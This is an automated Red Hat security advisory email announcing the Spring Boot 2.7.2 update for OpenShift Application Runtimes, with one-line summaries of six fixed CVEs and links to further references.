From: Red Hat Errata Notifications
To: douglas.doring@csiway.com.br
Subject: [Security Advisory] RHSA-2022:8761 Moderate: Red Hat support for Spring Boot 2.7.2 update
Date: Wed, 14 Dec 2022 14:00:45 +0000 (UTC)

The following Red Hat Security Advisory has been published which may affect subscriptions which you have purchased.

RHSA-2022:8761 Moderate: Red Hat support for Spring Boot 2.7.2 update

Summary:

An update is now available for Red Hat OpenShift Application Runtimes.

Red Hat support for Spring Boot provides an application platform that reduces the complexity of developing and operating applications (monoliths and microservices) for OpenShift as a containerized platform.

This release of Red Hat support for Spring Boot 2.7.2 serves as a replacement for Red Hat support for Spring Boot 2.5.12, and includes security, bug fixes and enhancements. For more information, see the release notes listed in the References section.

Security Fix(es):

* reactor-netty: specific redirect configuration allows for a credentials leak (CVE-2020-5404)
* kubernetes-client: Insecure deserialization in unmarshalYaml method (CVE-2021-4178)
* protobuf-java: potential DoS in the parsing procedure for binary data (CVE-2021-22569)
* undertow: potential security issue in flow control over HTTP/2 may lead to DOS(incomplete fix for CVE-2021-3629) (CVE-2022-1259)
* undertow: Double AJP response for 400 from EAP 7 results in CPING failures (CVE-2022-1319)
* spring-expression: Denial of service via specially crafted SpEL expression (CVE-2022-22950)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Full details and references:

https://access.redhat.com/errata/RHSA-2022:8761?sc_cid=701600000006NHXAA2

CVE Names: CVE-2020-5404 CVE-2021-4178 CVE-2021-22569 CVE-2022-1259 CVE-2022-1319 CVE-2022-22950

Revision History:

Issue Date: 2022-12-14
Updated: 2022-12-14

----------------------------------------------------------------------------------------------
Manage Errata Notifications
----------------------------------------------------------------------------------------------

You are receiving this email because you have elected to receive errata notifications from Red Hat.

This message is being sent to:

Red Hat login: douglasdoring
Email address on file:

Update your preferences at https://www.redhat.com/wapps/ugc/protected/notif.html

----------------------------------------------------------------------------------------------
Contact
----------------------------------------------------------------------------------------------

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

This is an automated message. Please do not reply. If you have further questions or concerns, please contact Red Hat Technical Support https://access.redhat.com/support/contact/technicalSupport/ or open a support case via the Red Hat Customer Portal https://access.redhat.com/support/cases/#/case/new/

Copyright 2022 Red Hat, Inc.